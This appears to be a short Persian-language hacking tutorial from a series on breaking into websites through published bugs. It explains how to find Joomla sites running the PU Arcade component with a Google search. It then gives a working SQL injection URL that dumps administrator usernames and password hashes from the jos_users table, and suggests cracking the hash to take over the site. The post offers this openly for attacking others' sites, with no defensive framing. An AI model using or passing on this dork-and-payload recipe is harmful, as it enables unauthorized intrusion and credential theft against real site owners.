امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو براتون گذاشتم!
این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای ( PU Arcade Remote SQL Injection ) هستند به هک آنها بپردازید!
خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:
index.php?option=com_puarcade
حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:
index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--
حال مشاهده خواهید کرد که پسورد Admin سایت را یه صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد اصلی سایت را به دست آورید!
منبع:پسورد35
